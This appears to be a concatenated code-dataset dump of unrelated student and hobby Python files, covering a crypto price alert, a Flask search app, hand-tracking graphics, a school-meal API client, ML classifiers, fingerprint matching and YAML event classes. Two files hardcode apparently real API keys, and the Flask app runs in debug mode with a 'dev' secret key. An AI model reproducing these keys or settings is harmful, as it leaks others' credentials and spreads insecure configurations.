'Z92Y0437GIRE1RCO'\n\nExchange_Rate = CURRENCY_EXCHANGE_RATE (from_currency = USD, to_currency=BTC)\n\nts = TimeSeries(key='api_key', output_format='pandas')\nfunction = cryptocurrencies.DIGITAL_CURRENCY_DAILY(symbol='BTC', market='USD', interval='day', outputsize='full')\n\nprint('Os dados do BTC são: ')\nprint(function)\n\n#i =1\n#para exportar em excel ou csv\n#while i==1:\n# data.to_excel(\"output.xlsx\")\n# time.sleep(60)\n\nclose_data = data['4. close']\npercentage_change = close_data.pct_change()\n\nprint(percentage_change)\n\nlast_change = percentage_change[-1]\n\n\nif abs(last_change) > 0.004:\n print('MSFT Alert'+ last_change)\n\n ","repo_name":"ArthurGini/EstudosPython","sub_path":"Financeiro/BTCStocks.py","file_name":"BTCStocks.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"32185666393","text":"# SJTU EE208\nimport os\nimport sys\n\nfrom werkzeug.utils import secure_filename\n\nfrom backend.SearchPages import init_lucene\nfrom flask import Flask, flash, redirect, render_template, request, url_for\n\nUPLOAD_FOLDER = './uploads'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n app.config.from_mapping(\n ENV='development',\n SECRET_KEY='dev',\n #DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\n )\n\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n init_lucene() \n\n # a simple page that says hello\n @app.route('/')\n def redirect_to_search():\n #return redirect(url_for('search.search_results',keywords='中国'))\n return redirect(url_for('search.search_webpages'))\n import search\n app.register_blueprint(search.bp)\n return app\n\n\napp=create_app()\napp.run(debug=True,port=8080)\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n#https://stackoverflow.com/questions/34066804/disabling-caching-in-flask\n#@app.before_first_request\n\n\n'''\n@app.route('/form', methods=['POST', 'GET'])\ndef bio_data_form():\n if request.method == \"POST\":\n username = request.form['username']\n age = request.form['age']\n email = request.form['email']\n hobbies = request.form['hobbies']\n return redirect(url_for('showbio', username=username, age=age, email=email, hobbies=hobbies))\n return render_template(\"bio_form.html\")\n\n\n@app.route('/showbio', methods=['GET'])\ndef showbio():\n username = request.args.get('username')\n age = request.args.get('age')\n email = request.args.get('email')\n hobbies = request.args.get('hobbies')\n return render_template(\"show_bio.html\", username=username, age=age, email=email, hobbies=hobbies)\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=8080)\n'''\n","repo_name":"wzj423/SJTU-EE208-Proj","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16470253309","text":"import cv2\r\nimport mediapipe as mp\r\nimport math\r\nimport pygame\r\nfrom pygame.locals import *\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\n\r\nverticies = (\r\n (1, -1, -1),\r\n (1, 1, -1),\r\n (-1, 1, -1),\r\n (-1, -1, -1),\r\n (1, -1, 1),\r\n (1, 1, 1),\r\n (-1, -1, 1),\r\n (-1, 1, 1)\r\n )\r\n\r\nedges = (\r\n (0,1),\r\n (0,3),\r\n (0,4),\r\n (2,1),\r\n (2,3),\r\n (2,7),\r\n (6,3),\r\n (6,4),\r\n (6,7),\r\n (5,1),\r\n (5,4),\r\n (5,7)\r\n )\r\n\r\n\r\ndef Cube():\r\n glBegin(GL_LINES)\r\n for edge in edges:\r\n for vertex in edge:\r\n glVertex3fv(verticies[vertex])\r\n glEnd()\r\n\r\n# Create a VideoCapture object to read frames from the camera\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Create a MediaPipe Hands object and configure the drawing settings\r\nmp_hands = mp.solutions.hands\r\nhands = mp_hands.Hands(static_image_mode=False, max_num_hands=2, min_detection_confidence=0.5)\r\nmp_drawing = mp.solutions.drawing_utils\r\ndrawing_styles = mp.solutions.drawing_styles\r\n\r\n# Set the background color to black\r\nbg_color = (0, 0, 0) # Black color\r\n\r\n# Set the hand landmarks and finger connections color to white\r\nlandmark_color = (255, 255, 255) # White color\r\nconnection_color = (255, 255, 255) # White color\r\npygame.init()\r\ndisplay = (800,600)\r\npygame.display.set_mode(display, DOUBLEBUF|OPENGL)\r\n\r\ngluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\r\n\r\nglTranslatef(0.0,0.0, -5)\r\n# Start the video processing loop\r\nwhile True:\r\n # Read frame from camera\r\n success, image = cap.read()\r\n if not success:\r\n break\r\n\r\n # Flip the image horizontally for a mirror-like effect\r\n image = cv2.flip(image, 1)\r\n\r\n # Convert the image to RGB\r\n image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n\r\n # Process the image with MediaPipe Hands\r\n results = hands.process(image_rgb)\r\n\r\n # Clear the background by filling it with the bg_color\r\n image = cv2.rectangle(image, (0, 0), (image.shape[1], image.shape[0]), bg_color, -1)\r\n\r\n # Draw hand landmarks and finger connections on the image\r\n if results.multi_hand_landmarks:\r\n for hand_landmarks in results.multi_hand_landmarks:\r\n mp_drawing.draw_landmarks(\r\n image,\r\n hand_landmarks,\r\n mp_hands.HAND_CONNECTIONS,\r\n landmark_drawing_spec=mp_drawing.DrawingSpec(color=landmark_color, thickness=2, circle_radius=4),\r\n connection_drawing_spec=mp_drawing.DrawingSpec(color=connection_color, thickness=2, circle_radius=2),\r\n )\r\n\r\n # Calculate distance between index finger tip and thumb tip\r\n index_finger_tip = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP]\r\n thumb_tip = hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP]\r\n\r\n x_diff = -thumb_tip.x + index_finger_tip.x\r\n y_diff = -thumb_tip.y + index_finger_tip.y\r\n z_diff = -thumb_tip.z + index_finger_tip.z\r\n\r\n distance = math.sqrt(x_diff**2 + y_diff**2 + z_diff**2)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n glRotatef(x_diff*100, y_diff*100, z_diff*100, 1)\r\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\r\n Cube()\r\n pygame.display.flip()\r\n pygame.time.wait(10)\r\n\r\n # Display the image\r\n cv2.imshow(\"Hand Tracking\", image)\r\n\r\n # Exit loop on 'q' key press\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# Release the VideoCapture and close the windows\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"srij1234/3d-fidget-spinner","sub_path":"spinner.py","file_name":"spinner.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39428101261","text":"import requests\nimport json\nfrom datetime import datetime\nurl = \"https://open.neis.go.kr/hub/mealServiceDietInfo\"\n\nservice_key = \"1aca86770d994a46aa72b9f94f2ba07e\"\n\nparams = {\n 'KEY' : service_key,\n 'Type' : 'json',\n 'pIndex' : '1',\n 'pSize' : '100',\n 'ATPT_OFCDC_SC_CODE' : 'S10',\n 'SD_SCHUL_CODE' : '9010041',\n \"MLSV_FROM_YMD\": datetime.today().strftime(\"%Y%m%d\"),\n \"MLSV_TO_YMD\" : datetime.today().strftime(\"%Y%m%d\")\n}\n\nresponse = requests.get(url, params=params)\nprint(response)\n\ndef find_meal():\n try:\n j_response = json.loads(response.text)[\"mealServiceDietInfo\"]\n if j_response[0][\"head\"][0][\"list_total_count\"] == 1:\n return j_response[1][\"row\"][0]\n else:\n return j_response[1][\"row\"]\n except:\n print(\"찾는 데이터가 없습니다.\")\n return response.text\n\n\ndef meal(x):\n data = find_meal()\n try:\n if x == 0:\n string = \"<중식>\\n\" + data[0][\"DDISH_NM\"].replace(\"
\", \"\\n\") + \"\\n\"\n else:\n string = \"<석식>\\n\" + data[1][\"DDISH_NM\"].replace(\"
\", \"\\n\")\n characters = \"1234567890./-*()\"\n for x in range(len(characters)):\n string = string.replace(characters[x], \"\")\n return string\n except:\n return \"오늘은 급식이 없습니다.\"\n","repo_name":"fruit8067/9jogithub","sub_path":"meal.py","file_name":"meal.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"4053659688","text":"inputs = open('inputs/day17.txt', 'r').read().strip()\n\ninputs = inputs[15:]\nxbounds, ybounds = [[int(i) for i in j.split(\"..\")] for j in inputs.split(\", y=\")]\n\ndef check_vel(vel_init):\n vel = vel_init\n pos = (0, 0)\n max_y = 0\n while pos[0] < xbounds[1] and pos[1] >= ybounds[0]:\n # print(pos, vel)\n pos = (pos[0]+vel[0], pos[1]+vel[1])\n max_y = max(max_y, pos[1])\n vx = 0\n if vel[0] >= 1:\n vx = vel[0]-1\n elif vel[0] <= -1:\n vx = vel[0]+1\n vel = (vx, vel[1]-1)\n if xbounds[0] <= pos[0] <= xbounds[1] and ybounds[0] <= pos[1] <= ybounds[1]:\n return True, max_y\n return False, 0\n\npossible_vels = set()\npart1 = 0\nfor x in range(0, 1000):\n for y in range(-1000, 1000):\n valid, max_y = check_vel((x, y))\n if valid:\n possible_vels.add((x, y))\n part1 = max(part1, max_y)\nprint(f\"part 1: {part1}\")\n\npart2 = len(possible_vels)\nprint(f\"part 2: {part2}\")\n","repo_name":"val-is/advent-of-code","sub_path":"2021/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"29094754100","text":"from __future__ import division, print_function, absolute_import\n\nimport numpy as np\nfrom .minimize import bfgs, dfp, lbfgs, _norm\n\nclass Logistic_Regressor():\n \"\"\" logistic regression classifier\n\n This class implement L2 regularized logistic regression and solve the problem in primer form\n\n Parameters\n ----------\n C : float, default=1.0\n Regularization term, smaller C specify stronger regularization\n \n solver : {'bfgs', 'dfp', 'lbfgs'}\n Method used to solve the optimization problem\n\n Attributes\n ----------\n w : array, shape (n_features+1,)\n Coefficients of the features in the decision function\n\n gradient : array\n Gradient value at the time of termination\n\n inv_hessian : array\n Approximation of the inverse hessian from Quasi Newton\n\n \"\"\"\n\n def __init__(self, C=1.0, solver='bfgs'):\n self.C = C\n self.solver = solver.lower()\n self.w = None\n self.inv_hessian = None\n self.gradient = None\n\n def _sgd(self, X, y, batch_size=50, beta=8, maxiter=None, tol=1e-6, disp=False):\n \"\"\" \"\"\"\n m = len(y)\n\n if m == 1:\n w = np.ones(len(X))\n else:\n w = np.ones(X.shape[1])\n \n if maxiter is None:\n maxiter = int(m * 10 / batch_size)\n print('Total iterations: {}'.format(maxiter))\n \n for k in xrange(maxiter):\n start = (k * batch_size) % m\n end = ((k+1)*batch_size) % m\n if start < end:\n X_batch = X[start:(end+1)]\n y_batch = y[start:(end+1)]\n else:\n X_batch = np.append(X[start:], X[:(end+1)], 0)\n y_batch = np.append(y[start:], y[:(end+1)])\n \n exp_margin = 1 - 1. / (1 + np.exp(-np.dot(X_batch, w)*y_batch))\n gk = (w - self.C * np.dot(X_batch.transpose(), exp_margin*y_batch)) / batch_size\n \n alphak = beta / (k+1)\n w = w - alphak * gk\n if disp:\n print('---------------------')\n print('Current iteration: {}'.format(k))\n print('current batch ||gk||: {}'.format(_norm(gk)))\n\n self.w = w\n self.gradient = gk\n \n def train(self, X, y, options=None):\n \"\"\" Fit the model given training data\n\n Parameters\n ----------\n X : array, shape (n_samples, n_features)\n Training samples, each has n_features features\n\n y : array, shape (n_samples,)\n Target values\n\n options : dict\n Other options controlling the behavior of the solver, pass directly to the solver as **options\n \n Returns\n ----------\n self\n\n \"\"\"\n\n if options is None:\n options = dict()\n \n _X = np.copy(np.asarray(X))\n _y = np.copy(np.asarray(y))\n _y[_y==0] = -1\n m, n = X.shape\n _X = np.append(_X, np.ones((m, 1)), 1)\n\n if self.w is None:\n self.w = np.zeros(n+1)\n else:\n print('Seems the regressor has already been trained')\n return self\n\n if self.solver == 'bfgs':\n opt = bfgs\n elif self.solver == 'dfp':\n opt = dfp\n elif self.solver == 'lbfgs':\n opt = lbfgs\n elif self.solver == 'sgd':\n self._sgd(_X, _y, **options)\n return self\n \n func = lambda w: 0.5 * np.dot(w, w) + self.C * np.sum(np.log(1+np.exp(-np.dot(_X, w)*_y)))\n exp_margin = lambda w: 1 - 1. / (1 + np.exp(-np.dot(_X, w)*_y))\n fprime = lambda w: w - self.C * np.dot(_X.transpose(), exp_margin(w)*_y)\n\n results = opt(func, fprime, self.w, **options)\n self.w = results['x_star']\n self.gradient = results['gradient']\n if self.solver != 'lbfgs':\n self.inv_hessian = results['inv_hessian']\n\n return self\n \n def predict_proba(self, X):\n \"\"\" \"\"\"\n _X = np.copy(np.asarray(X))\n if len(_X.shape) == 1:\n _X = np.append(_X, 1)\n else:\n m = _X.shape[0]\n _X = np.append(_X, np.ones((m, 1)), 1)\n \n if self.w is None:\n print('Please train the model first!')\n return None\n else:\n return 1. / (1 + np.exp(-np.dot(_X, self.w)))\n\n def predict(self, X, threshold=0.5):\n \"\"\" \"\"\"\n return np.asarray(self.predict_proba(X) > threshold, dtype=int)\n\n def score(self, X, y, verbose=False):\n \"\"\" \"\"\"\n m = len(y)\n n_pos = sum(y==1)\n y_pred = self.predict(X)\n n_pos_pred = sum(y_pred)\n precision = 0\n recall = 0\n if n_pos_pred > 0:\n precision = np.sum(y_pred[y_pred==y]==1) / n_pos_pred\n if n_pos > 0:\n recall = np.sum(y[y_pred==y]==1) / n_pos\n accuracy = sum(y_pred == y) / m\n\n if verbose:\n print('Sample size: {}'.format(m))\n print('Number of positives in the sample: {}'.format(n_pos))\n print('Number of predicted positives: {}'.format(n_pos_pred)) \n print(' Precision is: {:0.4f}'.format(precision))\n print(' Recall is {:0.4f}'.format(recall))\n print(' Prediction accuracy: {:0.4f}'.format(accuracy)) \n\n return dict(precision=precision, recall=recall, accuracy=accuracy)\n\n \n","repo_name":"yjxiao/no-project-quasi-newton","sub_path":"optimize/log_reg.py","file_name":"log_reg.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"24664910438","text":"from ClaseMedicamentos import Medicamentos\r\nimport csv\r\n\r\nclass ManejadorMaedicamentos:\r\n __ListaM=[]\r\n\r\n def __init__(self):\r\n self.__ListaM=[]\r\n\r\n\r\n def TestListaM (self):\r\n archivo2=open(\"medicamentos.csv\")\r\n reader=csv.reader(archivo2,delimiter=\";\")\r\n bandera=True\r\n for fila in reader:\r\n if(bandera):\r\n \"saltar cabecera\"\r\n bandera=not bandera\r\n else:\r\n idC2 = int(fila[0])\r\n idM= fila[1]\r\n nomC= fila[2]\r\n mono= fila[3]\r\n pres= fila[4]\r\n cant= fila[5]\r\n precio= fila[6]\r\n unMedicamento=Medicamentos(idC2, idM, nomC, mono, pres, cant, precio)\r\n self.__ListaM.append(unMedicamento)\r\n\r\n archivo2.close()\r\n\r\n def __str__(self):\r\n s=\"\"\r\n for lista in self.__ListaM:\r\n s+= str(lista) + \"\\n\"\r\n return s\r\n\r\n def mostrarM (self, indice):\r\n total=0\r\n print(\"Medicamento Presentacion Cantidad Precio\")\r\n for i in range (len(self.__ListaM)):\r\n if(self.__ListaM[i].getidCama2() == (indice+1)):\r\n total+=self.__ListaM[i].calculo()\r\n print(\"{} - {} - {} - {} \".format(self.__ListaM[i].getnom_comercial(),self.__ListaM[i].getpresentacion(),self.__ListaM[i].getcant_aplicada(),self.__ListaM[i].getprecio()))\r\n print(\"Total Adeudado: \",total)\r\n\r\n\r\n","repo_name":"SosaCristina/Practico-Integrador","sub_path":"ManejadorListaMedicamentos.py","file_name":"ManejadorListaMedicamentos.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73693640236","text":"# Class build\r\nimport pickle\r\nimport json\r\nimport re\r\nimport os\r\nimport glob\r\nimport time\r\nimport operator\r\n\r\nimport numpy as np\r\n\r\nfrom libs.minutiae import minutiae_points, plot_minutiae, process_minutiae, generate_tuple_profile\r\nfrom libs.matching import match_tuples, evaluate\r\nfrom libs.edges import match_edge_descriptors\r\nfrom libs.basics import load_image\r\nfrom libs.enhancing import enhance_image\r\nfrom libs.edges import edge_processing, sift_match\r\n\r\n\r\nclass Image:\r\n \"\"\"\r\n Containing element for images - stores image array and its tuple profile.\r\n\r\n \"\"\"\r\n def __init__(self, img_id: str, path: str, image_raw: np.array, image_enhanced: np.array, profile: dict):\r\n self.img_id = img_id\r\n self.path = path\r\n self.image_raw = image_raw\r\n self.image_enhanced = image_enhanced\r\n self.minutiae = None\r\n self.profile = profile\r\n\r\n def plot(self):\r\n \"\"\"\r\n Plots minutiae from the stored image.\r\n\r\n \"\"\"\r\n\r\n plot_minutiae(self.image_enhanced, list(self.profile.keys()), size=8)\r\n\r\nclass NumpyEncoder(json.JSONEncoder):\r\n \"\"\" Special json encoder for numpy types \"\"\"\r\n def default(self, obj):\r\n if isinstance(obj, np.integer):\r\n return int(obj)\r\n elif isinstance(obj, np.floating):\r\n return float(obj)\r\n elif isinstance(obj, np.ndarray):\r\n return obj.tolist()\r\n return json.JSONEncoder.default(self, obj)\r\nclass FingerMatch:\r\n def __init__(self, model: str = 'tree', threshold: int = 125):\r\n self.images = []\r\n self.model = model\r\n self.threshold = threshold\r\n\r\n def loadData(self, path: str, image_format: str = 'tif', limit: int = None) -> None:\r\n \"\"\"\r\n Load data that matches the image_format, from the given path. Each image is processed and stored.\r\n\r\n \"\"\"\r\n\r\n # img_paths = [glob.glob(f'{path}/*.{image_format}', recursive=True)][0]\r\n img_paths = [path + '/' + f for f in os.listdir(path)]\r\n\r\n try:\r\n assert len(img_paths) > 0\r\n except:\r\n raise FileNotFoundError(f'ERROR: No image files available to extract from the path {path}')\r\n\r\n if limit is not None:\r\n # Restrict sample size.\r\n img_paths = img_paths[:limit]\r\n\r\n start = time.time()\r\n\r\n for p in img_paths:\r\n # Image loading\r\n image_raw = load_image(p, True)\r\n\r\n try:\r\n # Image properties definition.\r\n img_id = re.search(f'(.+?).{image_format}', os.path.basename(p)).group(1)\r\n except AttributeError:\r\n raise Exception(f'ERROR: Unknown image id for {p}')\r\n\r\n # Create new profile for the given image and store it.\r\n self.images.append(Image(img_id, p, image_raw, None, None))\r\n\r\n print(f'\\nINFO: Dataset loaded successfully. Duration: {round(time.time() - start, 2)} sec')\r\n\r\n def trainData(self):\r\n \"\"\"\r\n Loads model on the given dataset.\r\n\r\n \"\"\"\r\n\r\n start = time.time()\r\n print(f'INFO: Loading model features. Model: {self.model.lower()}')\r\n\r\n if self.model.lower() == 'tree':\r\n for i in range(len(self.images)):\r\n # Extract minutiae.\r\n try:\r\n self.images[i].image_enhanced = enhance_image(self.images[i].image_raw, skeletonise=True)\r\n minutiae = process_minutiae(self.images[i].image_enhanced)\r\n\r\n # Confirmed point matching.\r\n self.images[i].profile = generate_tuple_profile(minutiae)\r\n \r\n # Rewriting to the loaded data.\r\n self.images[i].minutiae = minutiae\r\n except:\r\n pass\r\n\r\n print(f'INFO: Training completed in {round(time.time() - start, 2)} sec')\r\n\r\n def save_as_pickle(self):\r\n with open(\"/home/tan/Documents/PythonProjects/AI/FingerMatch-20220508T085804Z-001/FingerMatch/src/dt.json\", \"wb\") as output:\r\n pickle.dump(self.images, output)\r\n\r\n def save_to_json(self):\r\n ar = []\r\n images = self.images\r\n for i in images:\r\n profileDict = {}\r\n for x, y in i.profile.items():\r\n profileDict[str(x)] = y\r\n i.profile = profileDict\r\n i.image_raw = None\r\n i.path = None\r\n i.image_enhanced = None\r\n i.minutiae = None\r\n # print(json.dumps(i.__dict__, cls=NumpyEncoder))\r\n ar.append(json.dumps(i.__dict__, cls=NumpyEncoder))\r\n with open(\"/home/tan/Documents/PythonProjects/AI/FingerMatch-20220508T085804Z-001/FingerMatch/src/dt.json\", \"w\") as op:\r\n json.dump(ar, op)\r\n\r\n def load_from_pickle(self):\r\n with open(\"/home/hoangdo/Documents/python/fingerprint-recognition/FingerMatch/src/data.json\", \"rb\") as f:\r\n self.images = pickle.load(f)\r\n\r\n def load_from_json(self):\r\n with open(\"/home/tan/Documents/PythonProjects/AI/FingerMatch-20220508T085804Z-001/FingerMatch/src/dt.json\", \"r\") as f:\r\n images = json.load(f)\r\n minutiae = []\r\n for i in images:\r\n profileDict = {}\r\n img = json.loads(i)\r\n for x, y in img[\"profile\"].items():\r\n profileDict[tuple(x)] = y\r\n minutiae.append(tuple(x))\r\n img[\"profile\"] = profileDict\r\n img[\"minutiae\"] = minutiae\r\n self.images.append(img)\r\n\r\n def matchFingerprint(self, image: np.array, verbose: bool = False, match_th: int = 33):\r\n \"\"\"\r\n The given image is compared against the loaded templates.\r\n A similarity score is computed and used to determine the most likely match, if any.\r\n\r\n \"\"\"\r\n if self.model.lower() == 'tree':\r\n\r\n img_test = enhance_image(image, skeletonise=True) # image input enhance\r\n\r\n minutiae_test = process_minutiae(img_test) ## all minutiae \r\n # Confirmed point matching.\r\n img_profile = generate_tuple_profile(minutiae_test) # all profile\r\n\r\n matchest_fingerprint = self.images[0]\r\n match_point = 0\r\n\r\n for i in range(len(self.images)):\r\n # Matching.\r\n # So diem minutiae trung nhau giua 2 anh\r\n common_points_base, common_points_test = match_tuples(self.images[i][\"profile\"], img_profile)\r\n\r\n # So diem minutiae max giua 2 anh(anh dau vao va anh dang truy van) \r\n minutiae_score = max(len(self.images[i][\"profile\"]), len(img_profile), 1)\r\n\r\n if len(common_points_base) / minutiae_score > match_point:\r\n match_point = len(common_points_base) / minutiae_score #So diem trung nhau cua anh dau vao va anh truy van / max\r\n matchest_fingerprint = self.images[i]\r\n\r\n print(f'Matching fingerprint is {matchest_fingerprint[\"img_id\"]} with points: {match_point}')\r\n","repo_name":"Manjushanair/fingerprint-recognition","sub_path":"FingerMatch/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42052196194","text":"#se busca saber el volumen de un cilindro\n\nprint('se busca calcular el volumen de un cilidro con el radio y altura')\n\nradio = float(input('Dame el radio del cilindro \\n'))\n\naltura = float(input('Dame la Altura del cilindro \\n'))\n\nvolumen = 3.1416 * (radio **2 )*altura\n\nprint(f'el volumen del cilindro es {volumen:.2f}')\n","repo_name":"Rito250693/compapl-2022","sub_path":"p12-volumen-cilindro.py","file_name":"p12-volumen-cilindro.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1895268404","text":"# coding: utf-8\n\nfrom ruamel.yaml.compat import _F\n\n# Abstract classes.\n\nif False: # MYPY\n from typing import Any, Dict, Optional, List # NOQA\n\nSHOW_LINES = False\n\n\ndef CommentCheck():\n # type: () -> None\n pass\n\n\nclass Event:\n __slots__ = 'start_mark', 'end_mark', 'comment'\n\n def __init__(self, start_mark=None, end_mark=None, comment=CommentCheck):\n # type: (Any, Any, Any) -> None\n self.start_mark = start_mark\n self.end_mark = end_mark\n # assert comment is not CommentCheck\n if comment is CommentCheck:\n comment = None\n self.comment = comment\n\n def __repr__(self):\n # type: () -> Any\n if True:\n arguments = []\n if hasattr(self, 'value'):\n # if you use repr(getattr(self, 'value')) then flake8 complains about\n # abuse of getattr with a constant. When you change to self.value\n # then mypy throws an error\n arguments.append(repr(self.value)) # type: ignore\n for key in ['anchor', 'tag', 'implicit', 'flow_style', 'style']:\n v = getattr(self, key, None)\n if v is not None:\n arguments.append(_F('{key!s}={v!r}', key=key, v=v))\n if self.comment not in [None, CommentCheck]:\n arguments.append('comment={!r}'.format(self.comment))\n if SHOW_LINES:\n arguments.append(\n '({}:{}/{}:{})'.format(\n self.start_mark.line,\n self.start_mark.column,\n self.end_mark.line,\n self.end_mark.column,\n )\n )\n arguments = ', '.join(arguments) # type: ignore\n else:\n attributes = [\n key\n for key in ['anchor', 'tag', 'implicit', 'value', 'flow_style', 'style']\n if hasattr(self, key)\n ]\n arguments = ', '.join(\n [_F('{k!s}={attr!r}', k=key, attr=getattr(self, key)) for key in attributes]\n )\n if self.comment not in [None, CommentCheck]:\n arguments += ', comment={!r}'.format(self.comment)\n return _F(\n '{self_class_name!s}({arguments!s})',\n self_class_name=self.__class__.__name__,\n arguments=arguments,\n )\n\n\nclass NodeEvent(Event):\n __slots__ = ('anchor',)\n\n def __init__(self, anchor, start_mark=None, end_mark=None, comment=None):\n # type: (Any, Any, Any, Any) -> None\n Event.__init__(self, start_mark, end_mark, comment)\n self.anchor = anchor\n\n\nclass CollectionStartEvent(NodeEvent):\n __slots__ = 'tag', 'implicit', 'flow_style', 'nr_items'\n\n def __init__(\n self,\n anchor,\n tag,\n implicit,\n start_mark=None,\n end_mark=None,\n flow_style=None,\n comment=None,\n nr_items=None,\n ):\n # type: (Any, Any, Any, Any, Any, Any, Any, Optional[int]) -> None\n NodeEvent.__init__(self, anchor, start_mark, end_mark, comment)\n self.tag = tag\n self.implicit = implicit\n self.flow_style = flow_style\n self.nr_items = nr_items\n\n\nclass CollectionEndEvent(Event):\n __slots__ = ()\n\n\n# Implementations.\n\n\nclass StreamStartEvent(Event):\n __slots__ = ('encoding',)\n\n def __init__(self, start_mark=None, end_mark=None, encoding=None, comment=None):\n # type: (Any, Any, Any, Any) -> None\n Event.__init__(self, start_mark, end_mark, comment)\n self.encoding = encoding\n\n\nclass StreamEndEvent(Event):\n __slots__ = ()\n\n\nclass DocumentStartEvent(Event):\n __slots__ = 'explicit', 'version', 'tags'\n\n def __init__(\n self,\n start_mark=None,\n end_mark=None,\n explicit=None,\n version=None,\n tags=None,\n comment=None,\n ):\n # type: (Any, Any, Any, Any, Any, Any) -> None\n Event.__init__(self, start_mark, end_mark, comment)\n self.explicit = explicit\n self.version = version\n self.tags = tags\n\n\nclass DocumentEndEvent(Event):\n __slots__ = ('explicit',)\n\n def __init__(self, start_mark=None, end_mark=None, explicit=None, comment=None):\n # type: (Any, Any, Any, Any) -> None\n Event.__init__(self, start_mark, end_mark, comment)\n self.explicit = explicit\n\n\nclass AliasEvent(NodeEvent):\n __slots__ = 'style'\n\n def __init__(self, anchor, start_mark=None, end_mark=None, style=None, comment=None):\n # type: (Any, Any, Any, Any, Any) -> None\n NodeEvent.__init__(self, anchor, start_mark, end_mark, comment)\n self.style = style\n\n\nclass ScalarEvent(NodeEvent):\n __slots__ = 'tag', 'implicit', 'value', 'style'\n\n def __init__(\n self,\n anchor,\n tag,\n implicit,\n value,\n start_mark=None,\n end_mark=None,\n style=None,\n comment=None,\n ):\n # type: (Any, Any, Any, Any, Any, Any, Any, Any) -> None\n NodeEvent.__init__(self, anchor, start_mark, end_mark, comment)\n self.tag = tag\n self.implicit = implicit\n self.value = value\n self.style = style\n\n\nclass SequenceStartEvent(CollectionStartEvent):\n __slots__ = ()\n\n\nclass SequenceEndEvent(CollectionEndEvent):\n __slots__ = ()\n\n\nclass MappingStartEvent(CollectionStartEvent):\n __slots__ = ()\n\n\nclass MappingEndEvent(CollectionEndEvent):\n __slots__ = ()\n","repo_name":"spack/spack","sub_path":"lib/spack/external/_vendoring/ruamel/yaml/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"72740596396","text":"from LearnNSE import *\n\n# get the dataset in next time step\ndef get_next_dataset(df, batch, k, target_name):\n '''\n @df: data frame\n @batch: the number of training datasets you need\n @k: the kth time in the training and testing loop, where k > 0\n @target_name: the name of the target column\n '''\n # get sub-dataset of all dataset, which length equals to batch\n X_train = df[(k-1)*batch : (k)*batch]\n\n # X_train, y_train\n y_train = pd.DataFrame(X_train[target_name])\n X_train = X_train.drop(columns=target_name)\n\n return X_train, y_train\n\n############# Training Learn++.NSE #############\n# record\nrecord = []\n\n# number of run time\nRunTime = 10 # default=10\n\n# count the time length\ntime_length = len(df) # df is your dataframe\nbatch = int((1/RunTime)*time_length) # take 1/RunTime of all dataset\n\n# set a model\nLearnPPNSE = LearnNSE()\n\n# framework\nfor k in range(1,RunTime+1):\n # at least a model inside \n if k == 1:\n # get the dataset for training\n X_train, y_train = get_next_dataset(df=df, batch=batch, k=k, target_name='Label')\n # training model\n LearnPPNSE.fit(X_train, y_train)\n # re-compute voting weight\n LearnPPNSE.revoting(X_train, y_train)\n \n else:\n # get the dataset for training\n X_train, y_train = get_next_dataset(df=df, batch=batch, k=k, target_name='Label')\n # re-build the error distribution\n LearnPPNSE.redistribute_error_rate(X_train, y_train)\n # training model\n LearnPPNSE.fit(X_train, y_train)\n # re-compute voting weight\n LearnPPNSE.revoting(X_train, y_train)\n\n # testing & recording the score\n if k < RunTime:\n X_test, y_test = get_next_dataset(df=df, batch=batch, k=k+1, target_name='Label')\n score_B = LearnPPNSE.score(X_test, y_test)\n record.append(round(score, 